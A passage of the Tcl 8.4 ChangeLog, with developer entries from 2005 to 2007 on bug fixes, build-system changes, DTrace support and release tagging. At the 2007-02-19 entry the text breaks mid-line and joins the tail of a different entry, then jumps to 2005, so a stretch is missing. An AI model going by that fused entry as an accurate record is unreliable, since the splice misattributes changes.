2007-10-02 Jeff Hobbs <[email protected]> * generic/tcl.h (Tcl_DecrRefCount): Update change from 2006-05-29 to make macro more warning-robust in unbraced if code. 2007-10-02 Don Porter <[email protected]> * README: Bump version number to 8.4.17 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf-2.13 * win/configure: 2007-09-20 Don Porter <[email protected]> *** 8.4.16 TAGGED FOR RELEASE *** * doc/load.n: Backport corrected example. 2007-09-19 Don Porter <[email protected]> * unix/Makefile.in: Update `make dist` so that tclDTrace.d is included in the source code distribution. * generic/tclPkg.c: Backport fix for [1573844] to the * tests/pkg.test: TCL_TIP268 sections. 2007-09-18 Don Porter <[email protected]> * changes: updates for 8.4.16 release. 2007-09-15 Daniel Steffen <[email protected]> * unix/tcl.m4 (SunOS-5.1x): replace direct use of '/usr/ccs/bin/ld' in SHLIB_LD by 'cc' compiler driver. * unix/configure: autoconf-2.13 2007-09-14 Daniel Steffen <[email protected]> * generic/tclDTrace.d (new file): add DTrace provider for Tcl; allows * generic/tclCompile.h: tracing of proc and command entry & * generic/tclBasic.c: return, bytecode execution, object * generic/tclExecute.c: allocation and more; with essentially * generic/tclInt.h: zero cost when tracing is inactive; * generic/tclObj.c: enable with --enable-dtrace configure * generic/tclProc.c: arg (disabled by default, will only * unix/Makefile.in: enable if DTrace is present). * unix/configure.in: [Patch 1793984] * macosx/Makefile: enable DTrace support. * unix/configure: autoconf-2.13 2007-09-11 Don Porter <[email protected]> * library/tcltest/tcltest.tcl: Accept underscores and colons in * library/tcltest/pkgIndex.tcl: constraint names. Properly handle constraint expressions that return non-numeric boolean results like "false". Bump to tcltest 2.2.9. [Bug 1772989; RFE 1071322] 2007-09-11 Pat Thoyts <[email protected]> * win/makefile.vc: AMD64 target fixes for symbols builds. * win/rules.vc: 2007-09-10 Jeff Hobbs <[email protected]> * generic/tclLink.c (Tcl_UpdateLinkedVar): guard against var being unlinked. [Bug 1740631] (maros) 2007-08-25 Kevin Kenny <[email protected]> * generic/tclClock.c (FormatClock): Claimed additional space for the %c format code to avoid a buffer overrun when formatting (for example) a Friday in February in the Portuguese locale. [Bug 1751117] 2007-08-24 Miguel Sofer <[email protected]> * generic/tclCompile.c: replaced copy loop that tripped some compilers with memmove [Bug 1780870] 2007-08-14 Don Porter <[email protected]> * tests/trace.test: Backport some tests. 2007-08-14 Daniel Steffen <[email protected]> * unix/tclLoadDyld.c: use dlfcn API on Mac OS X 10.4 and later; fix issues with loading from memory on intel and 64bit; add debug messages. * tests/load.test: add test load-10.1 for loading from vfs. 2007-08-07 Daniel Steffen <[email protected]> * generic/tclEnv.c: improve environ handling on Mac OS X (adapted * unix/tclUnixPort.h: from Apple changes in Darwin tcl-64). * unix/Makefile.in: add support for compile flags specific to object files linked directly into executables. * unix/configure.in (Darwin): only use -seg1addr flag when prebinding; use -mdynamic-no-pic flag for object files linked directly into exes; support overriding TCL_PACKAGE_PATH in environment. 
* unix/configure: autoconf-2.13 2007-07-19 Don Porter <[email protected]> * generic/tclParse.c: In contexts where interp and parsePtr->interp might be different, be sure to use the latter for error reporting. 2007-07-05 Don Porter <[email protected]> * library/init.tcl (unknown): Corrected inconsistent error message in interactive [unknown] when empty command is invoked. [Bug 1743676] 2007-06-30 Donal K. Fellows <[email protected]> * generic/tclBinary.c (Tcl_BinaryObjCmd): De-fang an instance of the shared-result anti-pattern. [Bug 1716704] 2007-06-30 Zoran Vasiljevic <[email protected]> * generic/tclThread.c: Prevent RemeberSyncObj() from growing the sync object lists by reusing already free'd slots, if possible. See discussion on Bug 1726873 for more information. 2007-06-29 Daniel Steffen <[email protected]> * generic/tclAlloc.c: on Darwin, ensure memory allocated by * generic/tclThreadAlloc.c: the custom TclpAlloc()s is aligned to 16 byte boundaries (as is the case with the Darwin system malloc). 2007-06-27 Don Porter <[email protected]> * generic/tclCmdMZ.c: Corrected broken trace reversal logic in * generic/tclTest.c: TclCheckInterpTraces that led to infinite loop * tests/basic.test: when multiple Tcl_CreateTrace traces were set and one of them did not fire due to level restrictions. [Bug 1743941]. 2007-06-23 Daniel Steffen <[email protected]> * macosx/tclMacOSXNotify.c (AtForkChild): don't call CoreFoundation APIs after fork() on systems where that would lead to an abort(). 2007-06-10 Jeff Hobbs <[email protected]> * README: updated links. [Bug 1715081] 2007-06-06 Daniel Steffen <[email protected]> * unix/configure.in (Darwin): add plist for tclsh; link the * unix/Makefile.in (Darwin): Tcl and tclsh plists into their * macosx/Tclsh-Info.plist.in (new): binaries in all cases. * unix/tcl.m4 (Darwin): fix CF checks in fat 32&64bit builds. * unix/configure: autoconf-2.13 2007-06-05 Don Porter <[email protected]> * tests/result.test (result-6.2): Add test for [Bug 1649062] so that 8.4 and 8.5 both test the same outcome and we verify compatibility. 2007-05-30 Don Porter <[email protected]> * README: Bump version number to 8.4.16 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf-2.13 * win/configure: 2007-05-29 Jeff Hobbs <[email protected]> * unix/tclUnixThrd.c (Tcl_JoinThread): fix for 64-bit handling of pthread_join exit return code storage. [Bug 1712723] 2007-05-24 Don Porter <[email protected]> *** 8.4.15 TAGGED FOR RELEASE *** * generic/tclIO.c: Backport memleak fix in TclFinalizeIOSubsystem. 2007-05-17 Don Porter <[email protected]> * tests/fCmd.test: Backport the notNetworkFilesystem constraint. 2007-05-15 Don Porter <[email protected]> * generic/tclNamesp.c: Plugged memory leak related to [namespace delete ::]. [Bug 1716782] * changes: updates for 8.4.15 release. * win/tclWinReg.c: Bump to registry 1.1.5 to account * library/reg/pkgIndex.tcl: for [Bug 1682211] fix. 2007-05-10 Don Porter <[email protected]> * generic/tclInt.h: TclFinalizeThreadAlloc() is always defined, so make sure it is also always declared. [Tcl Bug 1706140] * generic/tclCmdMZ.c (Trace*Proc): Update Tcl_VarTraceProcs so * generic/tclLink.c (LinkTraceProc): that they call * generic/tclUtil.c (TclPrecTraceProc): Tcl_InterpDeleted() for themselves, and do not rely on (frequently buggy) setting of the TCL_INTERP_DESTROYED flag by the trace core. 
* generic/tclVar.c: Update callers of CallVarTraces to not pass in the TCL_INTERP_DESTROYED flag. Also apply filters so that public routines only pass documented flag values down to lower level routines. * generic/tclVar.c (CallVarTraces): The setting of the TCL_INTERP_DESTROYED flag is now done entirely within the CallVarTraces routine, the only place it can be done right. 2007-04-30 Daniel Steffen <[email protected]> * unix/Makefile.in: add 'tclsh' dependency to install targets that rely on tclsh, fixes parallel 'make install' from empty build dir. 2007-04-29 Daniel Steffen <[email protected]> * unix/tclUnixFCmd.c: add workaround for crashing bug in fts_open() * unix/tclUnixInit.c: without FTS_NOSTAT on 64bit Darwin 8 or earlier. * unix/tclLoadDyld.c (TclpLoadMemory): fix (void*) arithmetic. * macosx/tclMacOSXNotify.c: fix warnings. * macosx/README: sync whitespace/formatting with HEAD. * macosx/tclMacOSXBundle.c: * macosx/tclMacOSXNotify.c: * unix/tclLoadDyld.c: * macosx/Makefile: fix/add copyright and license refs. * macosx/tclMacOSXBundle.c: * macosx/Tcl-Info.plist.in: * unix/Makefile.in (dist): copy license.terms to dist macosx dir. * unix/configure.in: install license.terms into Tcl.framework. * unix/configure: autoconf-2.13 2007-04-21 Kevin B. Kenny <[email protected]> * generic/tclClock.c: Restored Cygwin buildability [Bug 1387154] * generic/tclInt.decls: Yet another round of attempting * generic/tclInt.h: to get the correct type signature * unix/tclUnixPort.h: for TclpLocaltime and TclpGmtime. * unix/tclUnixTime.c: CONST TclpTime_t is a 'time_t *CONST' * win/tclWinTime.c: and not a 'CONST time_t*' [Bug 1677275] * generic/tclIntDecls.h: * generic/tclIntPlatDecls.h: Regenerated. 2007-03-24 Zoran Vasiljevic <[email protected]> * win/tclWinThrd.c: Thread exit handler marks the current thread as un-initialized. This allows exit handlers that are registered later to re-initialize this subsystem in case they need to use some sync primitives (cond variables) from this file again. 2007-03-19 Don Porter <[email protected]> * generic/tclEvent.c (Tcl_CreateThread): Replaced some calls to * generic/tclPkg.c (CheckVersion): Tcl_Alloc() with calls to * unix/tclUnixTime.c (SetTZIfNecessary): ckalloc(), which better * win/tclAppInit.c (setargv): supports memory debugging. 2007-03-17 Kevin Kenny <[email protected]> * win/tclWinReg.c (GetKeyNames): Size the buffer for enumerating key names correctly, so that Unicode names exceeding 127 chars can be retrieved without crashing. [Bug 1682211] * tests/registry.test (registry-4.9): Added test case for the above bug. 2007-03-13 Don Porter <[email protected]> * generic/tclExecute.c (INST_FOREACH_STEP4): Re-fetch pointers for * tests/foreach.test (foreach-10.1): the value list each iteration of the loop as defense against shimmers. [Bug 1671087] * generic/tclVar.c (TclArraySet): Re-fetch pointers for the list * tests/var.test (var-17.1): argument of [array set] each time through the loop as defense against possible shimmer issues. [Bug 1669489]. 2007-03-10 Donal K. Fellows <[email protected]> * generic/tclCmdIL.c (Tcl_LsortObjCmd): Handle tricky case with loss * tests/cmdIL.test (cmdIL-1.29):of list rep during sorting due to shimmering. [Bug 1675116] 2007-03-07 Daniel Steffen <[email protected]> * macosx/tclMacOSXNotify.c: add spinlock debugging and sanity checks. * unix/tcl.m4 (Darwin): s/CFLAGS/CPPFLAGS/ in macosx-version-min check. * unix/configure: autoconf-2.13 2007-03-01 Donal K. 
Fellows <[email protected]> * generic/tclCompCmds.c (TclCompileForeachCmd): Prevent an unexpected * tests/foreach.test (foreach-9.1): infinite loop when the variable list is empty and the foreach is compiled. [Bug 1671138] 2007-02-22 Andreas Kupries <[email protected]> * tests/pkg.test: Added tests for the case of an alpha package satisfying a require for the regular package, demonstrating a corner case specified in TIP#280. More notes in the comments to the test. 2007-02-20 Don Porter <[email protected]> * doc/tcltest.n: Typo fix. [Bug 1663539] 2007-02-19 Jeff Hobbs <[email protected]> * generic/tclIOUtil.c (Tcl_FSEvalFile): safe incr of objPtr ref. * unix/tcl.m4: use>this". Note that Windows cannot support such access; there is no equivalent flag on the handle that can be set at the kernel-call level. The test is unix-specific in every way. [Bug 1245953] 2005-07-26 Mo DeJong <[email protected]> * unix/configure: Regen. * unix/configure.in: Check for a $prefix/share directory and add it to the package search path if found. This will check for Tcl packages in /usr/local/share when Tcl is configured with the default dist install. [Patch 1231015] 2005-07-26 Don Porter <[email protected]> * doc/tclvars.n: Improved $errorCode documentation. [RFE 776921] * generic/tclBasic.c (Tcl_CallWhenDeleted): Converted to use per-thread counter, rather than a process global one that required mutex protection. [RFE 1077194] * generic/tclNamesp.c (TclTeardownNamespace): Re-ordering so that * tests/trace.test (trace-34.4): command delete traces fire while the command still exists. [Bug 1047286] 2005-07-24 Mo DeJong <[email protected]> * unix/tcl.m4 (SC_PROG_TCLSH, SC_BUILD_TCLSH): * win/tcl.m4 (SC_PROG_TCLSH, SC_BUILD_TCLSH): Split confused search for tclsh on PATH and build and install locations into two macros. SC_PROG_TCLSH searches just the PATH. SC_BUILD_TCLSH determines the name of the tclsh executable in the Tcl build directory. [Bug 1160114], [Patch 1244153] 2005-07-22 Don Porter <[email protected]> * library/auto.tcl: Updates to the Tcl script library to make * library/history.tcl: use of Tcl 8.4 features. Thanks to * library/init.tcl: Patrick Fradin for prompting on this. * library/package.tcl: [Patch 1237755] * library/safe.tcl: * library/word.tcl: 2005-07-07 Jeff Hobbs <[email protected]> * unix/tcl.m4, unix/configure: Backported [Bug 1095909], removing * unix/tclUnixPort.h: any use of readdir_r as it is not * unix/tclUnixThrd.c: necessary and just confuses things. 2005-07-05 Don Porter <[email protected]> * generic/tclCmdAH.c: New "encoding" Tcl_ObjType (not registered) * generic/tclEncoding.c: that permits longer lifetimes of the * generic/tclInt.h: Tcl_Encoding values kept as intreps of Tcl_Obj's. Reduces the need for repeated reading of encoding definition files from the filesystem. [Bug 1077262] * generic/tclNamesp.c: Allow for [namespace import] of a command * tests/namespace.test: over a previous [namespace import] of itself without throwing an error. [RFE 1230597] 2005-07-01 Zoran Vasiljevic <[email protected]> * unix/tclUnixNotfy.c: protect against spurious wake-ups while waiting on the condition variable when tearing down the notifier thread. [Bug 1222872] 2005-06-27 Don Porter <[email protected]> *** 8.4.11 TAGGED FOR RELEASE *** * library/auto.tcl: Reverted to Revision 1.12.2.3 (Tcl 8.4.9). Restores the (buggy) behavior of [auto_reset] that fails to clear away auto-loaded commands from non-global namespaces. 
Fixing this bug exposed an unknown number of buggy files out there (including at least portions of the Tk script library) that cannot tolerate double [source]-ing. The burden of fixing these exposed bugs will not be forced on package/extension/application authors until Tcl 8.5. 2005-06-24 Kevin Kenny <[email protected]> * generic/tclEvent.c (Tcl_Finalize): * generic/tclInt.h: * generic/tclPreserve.c (TclFinalizePreserve): Changed the finalization logic so that Tcl_Preserve finalizes after exit handlers run; a lot of code called from Tk's exit handlers presumes tha Tcl_Preserve will still work even from an exit handler. Also, made the assertion check that no exit handlers are created in Tcl_Finalize conditional on TCL_MEM_DEBUG to avoid spurious panics in the "stable" release. 2005-06-24 Don Porter <[email protected]> * library/auto.tcl: Make file safe to re-[source] without destroying registered auto_mkindex_parser hooks. 2005-06-23 Daniel Steffen <[email protected]> * tools/tcltk-man2html.tcl: fixed useversion glob pattern to accept multi-digit patchlevels. 2005-06-23 Kevin Kenny <[email protected]> * win/tclWinChan.c: More rewriting of __asm__ blocks that * win/tclWinFCmd.c: implement SEH in GCC, because mingw's gcc 3.4.2 is not as forgiving of violations committed by the old code and caused panics. [Bug 1225957] 2005-06-23 Daniel Steffen <[email protected]> * unix/Makefile.in (install-private-headers): rewrite tclPort.h when installing private headers to remove ../unix relative #include path to tclUnixPort.h (which is incorrect at the installed location). 2005-06-22 Kevin Kenny <[email protected]> * generic/tclInt.h: Changed the finalization * generic/tclEvent.c (Tcl_Finalize): logic to defer the * generic/tclIO.c (TclFinalizeIOSubsystem): shutdown of the pipe * unix/tclUnixPipe.c (TclFinalizePipes): management until after * win/tclWinPipe.c (TclFinalizePipes): all channels have been closed, in order to avoid a situation where the Windows PipeCloseProc2 would re-establish the exit handler after exit handlers had already run, corrupting the heap. [Bug 1225727] Corrected a read of uninitialized memory in PipeCloseProc2, which (at least on certain configurations) caused a great number of tests to either fail or hang. [Bug 1225044] 2005-06-22 Andreas Kupries <[email protected]> * generic/tclInt.h: Followup to change made on 2005-06-18 by Daniel Steffen. There are compilers (*) who error out on the redefinition of WORDS_BIGENDIAN. We have to undef the previous definition (on the command line) first to make this acceptable. (*): AIX native. 2005-06-22 Don Porter <[email protected]> * win/tclWinFile.c: Potential buffer overflow. [Bug 1225571] Thanks to Pat Thoyts for discovery and fix. * tests/safe.test: Backport performance improvement from reduced $::auto_path. 2005-06-21 Pat Thoyts <[email protected]> * tests/winDde.test: Added some waits to the dde server script to let event processing run after we create the dde server and before we exit the server process. This avoids 'server did not respond' errors. 2005-06-21 Kevin Kenny <[email protected]> * generic/tclFileName.c: Corrected a problem where a directory name containing a colon can crash the process on Windows [Bug 1194458] * tests/fileName.test: Added test for [file split] and [file join] with a name containing a colon. * win/tclWinPipe.c: Reverted davygrvy's changes of 2005-04-19; they cause multiple failures in io.test. 
[Bug 1225044, still open] 2005-06-21 Don Porter <[email protected]> * generic/tclBasic.c: Made the walk of the active trace list aware * generic/tclCmdMZ.c: of the direction of trace scanning, so the * generic/tclInt.h: proper correction can be made. [Bug 1224585] * tests/trace.test (trace-34.2,3): * generic/tclBasic.c (Tcl_DeleteTrace): Added missing walk of the * tests/trace.test (trace-34.1): list of active traces to cleanup references to traces being deleted. [Bug 1201035] 2005-06-20 Don Porter <[email protected]> * doc/FileSystem.3: added missing Tcl_GlobTypeData documentation [Bug 935853] 2005-06-18 Daniel Steffen <[email protected]> * generic/tclInt.h: ensure WORDS_BIGENDIAN is defined correctly with fat compiles on Darwin (i.e. ppc and i386 at the same time), the configure AC_C_BIGENDIAN check is not sufficient in this case because a single run of the compiler builds for two architectures with different endianness. * unix/tcl.m4 (Darwin): add -headerpad_max_install_names to LDFLAGS to ensure we can always relocate binaries with install_name_tool. * unix/configure: autoconf-2.13 2005-06-18 Don Porter <[email protected]> * changes: Update changes for 8.4.11 release * README: Bump version number to 8.4.11 * generic/tcl.h: * tools/tcl.wse.in: * unix/configure.in: * unix/tcl.spec: * win/README.binary: * win/configure.in: * unix/configure: autoconf * win/configure: 2005-06-18 Donal K. Fellows <[email protected]> * generic/tclCmdAH.c (Tcl_FormatObjCmd): Fix for [Bug 1154163]; only * tests/format.test: insert 'l' modifier when it is needed. 2005-06-07 Donal K. Fellows <[email protected]> * unix/tclUnixNotfy.c (Tcl_FinalizeNotifier): Add dummy variable so threaded build compiles. 2005-06-06 Kevin B. Kenny <[email protected]> * win/tclWin32Dll.c: Corrected another buglet in the assembly code for stack probing on Win32/gcc. [Bug 1213678] 2005-06-03 Daniel Steffen <[email protected]> *** 8.4.10 TAGGED FOR RELEASE *** * unix/tclLoadDyld.c: fixed header conflict when building this file with USE_TCL_STUBS. * macosx/Makefile: fixed 'embedded' target. 2005-06-02 Jeff Hobbs <[email protected]> * unix/Makefile.in (html): add BUILD_HTML_FLAGS optional var * tools/tcltk-man2html.tcl: add a --useversion to prevent confusion when multiple Tcl source dirs exist. * changes: updated for 8.4.10 release (porter) 2005-05-31 Zoran Vasiljevic <[email protected]> * unix/tclUnixNotfy.c: the notifier thread is now created as joinable thread and it is properly joined in Tcl_FinalizeNotifier. This is an attempt to fix [Bug 1082283] 2005-05-29 Jeff Hobbs <[email protected]> * win/tclWinThrd.c (TclpFinalizeThreadData): move tlsKey defn to top of file and clarify name (was 'key'). [Bug 1204064] 2005-05-27 Jeff Hobbs <[email protected]> * README: Bumped patchlevel to 8.4.10 * generic/tcl.h: * tools/tcl.wse.in: * unix/tcl.spec, unix/configure, unix/configure.in: * win/configure, win/configure.in: 2005-05-26 Daniel Steffen <[email protected]> * macosx/Makefile: moved & corrected EMBEDDED_BUILD check. * unix/configure.in: corrected framework finalization to softlink stub library to Versions/8.x subdir instead of Versions/Current. * unix/configure: autoconf-2.13 2005-05-25 Jeff Hobbs <[email protected]> * generic/tclCmdMZ.c (Tcl_TimeObjCmd): add necessary cast * unix/configure, unix/configure.in: ensure false Tcl.framework is only created with --enable-framework 2005-05-24 Daniel Steffen <[email protected]> * tests/env.test: added DYLD_FRAMEWORK_PATH to the list of env vars that need to be handled specially. 
* macosx/Makefile: * macosx/README: * macosx/Tcl-Info.plist.in (new file): * unix/Makefile.in: * unix/configure.in: * unix/tcl.m4: * unix/tclUnixInit.c: moved all Darwin framework build support from macosx/Makefile into the standard unix configure/make buildsystem, the macosx/Makefile is no longer required to build Tcl.framework (but its functionality is still available for backwards compatibility). * unix/configure: autoconf-2.13 * generic/tclIOUtil.c (TclLoadFile): * generic/tclInt.h: * unix/tcl.m4: * unix/tclLoadDyld.c: added support for [load]ing .bundle binaries in addition to .dylib's: .bundle's can be [unload]ed (unlike .dylib's), and can be [load]ed from memory, e.g. directly from VFS without needing to be written out to a temporary location first. [Bug 1202209] * unix/configure: autoconf-2.13 * generic/tclCmdMZ.c (Tcl_TimeObjCmd): change [time] called with a count > 1 to return a string with a float value instead of a rounded off integer. [Bug 1202178] 2005-05-20 Zoran Vasiljevic <[email protected]> * generic/tclParseExpr.c: removed unreferenced stack variable "errMsg" probably included by fixing [Bug 1201589] (see below). 2005-05-20 Don Porter <[email protected]> * generic/tclParseExpr.c: Corrected parser to recognize all boolean literals accepted by Tcl_GetBoolean, including prefixes like "y" and "f", and to allow "eq" and "ne" as function names in the proper context. [Bug 1201589] 2005-05-19 Daniel Steffen <[email protected]> * macosx/tclMacOSXNotify.c (Tcl_InitNotifier): fixed crashing CFRelease of runLoopSource in Tcl_InitNotifier (reported by Zoran): CFRunLoopAddSource doesn't CFRetain, so can only CFRelease the runLoopSource in Tcl_FinalizeNotifier. 2005-05-14 Daniel Steffen <[email protected]> * macosx/tclMacOSXBundle.c: * unix/tclUnixInit.c: * unix/tcl.m4 (Darwin): made use of CoreFoundation API configurable and added test of CoreFoundation availability to allow building on ppc64, replaced HAVE_CFBUNDLE by HAVE_COREFOUNDATION; test for availability of Tiger or later OSSpinLockLock API. * unix/tclUnixNotfy.c: * unix/Makefile.in: * macosx/tclMacOSXNotify.c (new file): when CoreFoundation is available, use new CFRunLoop based notifier: allows easy integration with other event loops on Mac OS X, in particular the TkAqua Carbon event loop is now integrated via a standard tcl event source (instead of TkAqua upon loading having to finalize the existing notifier and replace it with its custom version). [Patch 1202052] * tests/unixNotfy.test: don't run unthreaded tests on Darwin since notifier may be using threads even in unthreaded core. * unix/tclUnixPort.h: * unix/tcl.m4 (Darwin): test for thread-unsafe realpath during configure, as Darwin 7 and later realpath is threadsafe. * macosx/tclMacOSXBundle.c: * unix/tclLoadDyld.c: * unix/tclUnixInit.c: fixed gcc 4.0 warnings. * unix/configure: autoconf-2.13 2005-05-10 Jeff Hobbs <[email protected]> * tests/string.test: string-10.[21-30] * generic/tclCmdMZ.c (Tcl_StringObjCmd): add extra checks to prevent possible UMR in unichar cmp function for string map. 2005-05-06 Jeff Hobbs <[email protected]> * unix/tcl.m4, unix/configure: correct Solaris 10 (5.10) check and add support for x86_64 Solaris cc builds. 2005-04-29 Donal K. Fellows <[email protected]> * doc/FileSystem.3: Backport of doc fix. [Bug 1172401] 2005-04-27 Don Porter <[email protected]> * library/init.tcl: Corrected flaw in interactive command * tests/main.test: auto-completion. [Bug 1191409] * tests/unixInit.test (7.1): Alternative fix for the 2005-04-22 commit. 
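A hedged sketch for the [time] change recorded above ([Bug 1202178]); the timing figure is machine-dependent and purely illustrative.

    % time {expr {1+1}} 1000
    0.812 microseconds per iteration
    ;# before the change a sub-microsecond body reported "0 microseconds per iteration"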
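A sketch relating to the 2005-05-20 parser entry above (and the [string is boolean] entry that follows): boolean literals follow Tcl_GetBoolean, which also accepts unambiguous prefixes of yes/no/true/false/on/off.

    expr {"yes" && "off"}     ;# 0
    string is boolean y       ;# 1  (prefix of "yes")
    string is boolean fal     ;# 1  (prefix of "false")
    string is boolean maybe   ;# 0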
2005-04-25 Daniel Steffen <[email protected]> * compat/string.h: fixed memchr() prototype for __APPLE__ so that we build on Mac OS X 10.1 again. * generic/tclNotify.c (TclFinalizeNotifier): fixed notifier not being finalized in unthreaded core (was testing for notifier initialization in current thread by checking thread id != 0 but thread id is always 0 in unthreaded core). * unix/tclUnixNotfy.c (Tcl_WaitForEvent): sync with HEAD: only declare and use timeout var in unthreaded core. * unix/Makefile.in: added @PLAT_SRCS@ to SRCS and split out NOTIFY_SRCS from UNIX_SRCS for parity with UNIX_OBJS & NOTIFY_OBJS. * unix/configure.in: only run check for broken strstr implementation if AC_REPLACE_FUNCS(strstr) hasn't already determined that strstr is unavailable, otherwise compat/strstr.o will be used twice (resulting in duplicate symbol link errors on Mac OS X 10.1) * unix/tcl.m4 (Darwin): added configure checks for recently added linker flags -single_module and -search_paths_first to allow building with older tools (and on Mac OS X 10.1), use -single_module in SHLIB_LD and not just T{CL,K}_SHLIB_LD_EXTRAS, added unexporting from Tk of symbols from libtclstub to avoid duplicate symbol warnings, added PLAT_SRCS definition for Mac OS X. (SC_MISSING_POSIX_HEADERS): added caching of dirent.h check. (SC_TCL_64BIT_FLAGS): fixed 'checking for off64_t' message output. * unix/configure: autoconf-2.13 2005-04-22 Don Porter <[email protected]> * generic/tclCmdMZ.c: Corrected intrep-dependence of * tests/string.test: [string is boolean] [Bug 1187123] 2005-04-22 Daniel Steffen <[email protected]> * tests/unixInit.test (7.1): fixed failure when running tests with -tmpdir arg not set to working dir. 2005-04-20 Don Porter <[email protected]> * generic/tclGet.c (Tcl_GetInt): Corrected error that did not * generic/tclObj.c (Tcl_GetIntFromObj): permit 0x80000000 to be recognized as an integer on TCL_WIDE_INT_IS_LONG systems [Bug 1090869] 2005-04-19 Jeff Hobbs <[email protected]> * tests/winPipe.test (winpipe-6.2): remove -blocking 1 as this one can truly block. 2005-04-19 David Gravereaux <[email protected]> * win/tclWinPipe.c: The pipe channel driver now respects the -blocking option when closing. The windows pipe driver now has the same behavior as the UNIX side. This change. * tests/winPipe.test (winpipe-6.1/2): added 'fconfigure $f -blocking 1' so the exit status can be acquired. 2005-04-13 David Gravereaux <[email protected]> * generic/tclIO.c (Tcl_SetChannelBufferSize): Lowest size limit * tests/io.test: changed from ten bytes to one byte. Need for * tests/iogt.test: this change was proven by Ross Cartlidge <[email protected]> where [read stdin 1] was grabbing 10 bytes followed by starting a child process that was intended to continue reading from stdin. Even with -buffersize set to one, nine chars were getting lost by the buffersize over reading for the native read() caused by [read]. 2005-04-12 Kevin B. Kenny <[email protected]> * compat/strstr.c: Added default definition of NULL to accommodate building on systems with badly broken headers. [Bug 1175161] 2005-04-09 Daniel Steffen <[email protected]> * macosx/README: updated requirements for OS & developer tool versions + other small fixes/cleanup. * unix/tcl.m4 (Darwin): added -single_module linker flag to TCL_SHLIB_LD_EXTRAS and TK_SHLIB_LD_EXTRAS. * unix/configure: autoconf-2.13 2005-04-05 Zoran Vasiljevic <[email protected]> Set of changes correcting huge memory waste (not a leak) when a thread exits. 
This has been introduced in 8.4.7 within an attempt to correctly cleanup after ourselves when Tcl library is being unloaded with the Tcl_Finalize() call. This fixes the [Bug 1178445]. * generic/tclInt.h: added prototypes for TclpFreeAllocCache() and TclFreeAllocCache() * generic/tclThreadAlloc.c: modified TclFinalizeThreadAlloc() to explicitly call TclpFreeAllocCache with the NULL-ptr as argument signalling cleanup of private tsd key used only by the threading allocator. * unix/tclUnixThrd.c: fixed TclpFreeAllocCache() to recognize when being called with NULL argument. This is a signal for it to clean up the tsd key associated with the threading allocator. * win/tclWinThrd.c: renamed TclWinFreeAllocCache to TclpFreeAllocCache and fixed to recognize when being called with NULL argument. This is a signal for it to clean up the tsd key associated with the threading allocator. 2005-04-05 Don Porter <[email protected]> * generic/tclExecute.c (ExprSrandFunc): Replaced incursions into the * generic/tclUtil.c (TclGetIntForIndex): intreps of numeric types with simpler calls of Tcl_GetIntFromObj and Tcl_GetLongFromObj, now that those routines are better behaved wrt shimmering. [Patch 1177129] 2005-03-29 Jeff Hobbs <[email protected]> * win/tcl.m4, win/configure: do not require cygpath in macros to allow msys alone as an alternative. * win/tclWinTime.c (TclpGetDate): use time_t for 'time' [Bug 1163422] 2005-03-18 Don Porter <[email protected]> * generic/tclCompCmds.c (TclCompileIncrCmd): Corrected checks for immediate operand usage to permit leading space and sign characters. Restores more efficient bytecode for [incr x -1] that got lost in the CONST string reforms of Tcl 8.4. [Bug 1165671] * generic/tclBasic.c (Tcl_EvalEx,TclEvalTokensStandard): * generic/tclCmdMZ.c (Tcl_SubstObj): * tests/basic.test (basic-46.4): Restored recursion limit * tests/parse.test (parse-19.*): testing in nested command substitutions within direct script evaluation (Tcl_EvalEx) that got lost in the parser reforms of Tcl 8.1. Added tests for correct behavior. [Bug 1115904] 2005-03-15 Vince Darley <[email protected]> * generic/tclFileName.c: * win/tclWinFile.c: * tests/winFCMd.test: fix to 'file pathtype' and 'file norm' failures on reserved filenames like 'COM1:', etc. 2005-03-15 Kevin B. Kenny <[email protected]> * generic/tclClock.c: * generic/tclDate.c: * generic/tclGetDate.y: * generic/tclInt.decls: * unix/tclUnixTime.c: * win/tclWinTime.c: Replaced 'unsigned long' variable holding times with 'Tcl_WideInt', to cope with systems on which a time_t is wider than a long (Win64) [Bug 1163422] * generic/tclIntDecls.h: Regen 2005-03-15 Pat Thoyts <[email protected]> * unix/tcl.m4: Make it work on OpenBSD again. Imported patch from the OpenBSD ports tree. 2005-03-10 Don Porter <[email protected]> * generic/tclCmdMZ.c (TclCheckInterpTraces): Corrected mistaken cast of ClientData to (TraceCommandInfo *) when not warranted. Thanks to Yuri Victorovich for the report. [Bug 1153871] 2005-03-08 Jeff Hobbs <[email protected]> * win/makefile.vc: clarify necessary defined vars that can come from MSVC or the Platform SDK. 2005-02-24 Don Porter <[email protected]> * library/tcltest/tcltest.tcl: Better use of [glob -types] to avoid * tests/tcltest.test: failed attempts to [source] a directory, and similar matters. Thanks to "mpettigr". [Bug 1119798] * library/tcltest/pkgIndex.tcl: Bump to tcltest 2.2.8 2005-02-23 Donal K. Fellows <[email protected]> * doc/CrtChannel.3 (THREADACTIONPROC): Formatting fix. 
[Bug 1149605] 2005-02-17 Jeff Hobbs <[email protected]> * win/tclWinFCmd.c (TraverseWinTree): use wcslen on wchar, not Tcl_UniCharLen. 2005-02-16 Miguel Sofer <[email protected]> * doc/variable.n: fix for [Bug 1124160], variables are detected by [info vars] but not by [info locals]. 2005-02-10 Jeff Hobbs <[email protected]> * unix/Makefile.in: remove SHLIB_LD_FLAGS (only for AIX, inlined * unix/tcl.m4: into SHLIB_LD). Combine AIX-* and AIX-5 * unix/configure: branches in SC_CONFIG_CFLAGS. Correct gcc builds for AIX-4+ and HP-UX-11. 2005-02-10 Miguel Sofer <[email protected]> * generic/tclBasic.c (Tcl_EvalObjEx): * tests/basic.test (basic-26.2): preserve the arguments passed to TEOV in the pure-list branch, in case the list shimmers away. Fix for [Bug 1119369], reported by Peter MacDonald. 2005-02-10 Donal K. Fellows <[email protected]> * doc/binary.n: Made the documentation of sign bit masking and [binary scan] consistent. [Bug 1117017] 2005-02-01 Don Porter <[email protected]> * generic/tclExecute.c (TclCompEvalObj): Removed stray statement left behind in prior code reorganization. 2005-01-28 Jeff Hobbs <[email protected]> * unix/configure, unix/tcl.m4: add solaris 64-bit gcc build support. [Bug 1021871] 2005-01-27 Jeff Hobbs <[email protected]> * generic/tclBasic.c (Tcl_ExprBoolean, Tcl_ExprDouble) (Tcl_ExprLong): Fix to recognize Tcl_WideInt type. [Bug 1109484] 2005-01-27 Andreas Kupries <[email protected]> TIP#218 IMPLEMENTATION * generic/tclDecls.h: 